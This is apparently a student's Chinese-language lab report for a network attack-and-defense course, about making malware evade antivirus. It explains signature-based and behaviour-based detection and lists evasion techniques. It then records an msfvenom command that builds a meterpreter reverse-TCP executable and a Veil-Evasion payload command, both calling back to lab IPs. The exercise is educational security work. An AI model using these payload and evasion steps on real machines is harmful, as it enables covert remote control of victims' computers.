20169221 2016-2017-2 《網絡攻防實踐》

實踐內容：

(1)理解免殺技術原理
(2)正確使用msf編碼器，veil-evasion，本身利用shellcode編程等免殺工具或技巧；
（成功實現了免殺的。如何作成功的簡單語言描述便可，不要截圖、指令。與殺軟共生的結果驗證要截圖。）
(3)經過組合應用各類技術實現惡意代碼免殺
(4)用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本

基礎問題回答

（1）殺軟是如何檢測出惡意代碼的？

• 基於特徵碼的檢測：殺軟經過對已存在的流行代碼特徵的提取與比對檢測到具備該特徵碼的程序就看成檢測到了惡意代碼。
• 基於行爲的檢測：殺軟經過檢測程序是否有更改註冊表行爲、是否有設置自啓動、是否有修改權限等等
  （2）免殺是作什麼？
• 經過一些手段來瞞過殺軟的檢測掃描，避免被殺毒軟件查殺，並能成功控制被植入機。
  （3）免殺的基本方法有哪些？
• 對惡意代碼進行加殼、用其餘語言或編譯器進行再編譯，利用shellcode進行編碼，減小對系統的修改，多在內存裏進行操做，多使用反彈式的鏈接

離實戰還缺些什麼技術或步驟？

還須要社會工程學的相關知識，來獲取靶機的權限和相關信息。

實踐過程記錄

msfvenom直接生成meterpreter可執行文件
得到Windows與Kali的IP地址
使用命令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.192.169 PORT=5312 -f exe > Aquarius5312.exe
用ncat將文件傳輸到windows，檢測：

Msfvenom使用編碼器生成meterpreter可執行文件
用ncat將文件傳輸到windows，並檢測：

Veil-Evasion生成可執行文件
直接輸入veil-evasion打開軟件
在menu裏面輸入如下命令來生成可執行文件：

use python/meterpreter/rev_tcp set LHOST 192.168.1.111 generate 5303test 1

生成一個c語言格式的Shellcode數組
而後用這個數組來編寫程序，因爲本身電腦上沒相應程序，因此用其餘同窗電腦上編寫再拷回來
監聽後纔打開的程序，在檢測的時候彈出來警告.
5.遇到的問題與解決過程

參考資料

[利用msfvenom生成木馬程序]（https://www.i0day.com/1173.html）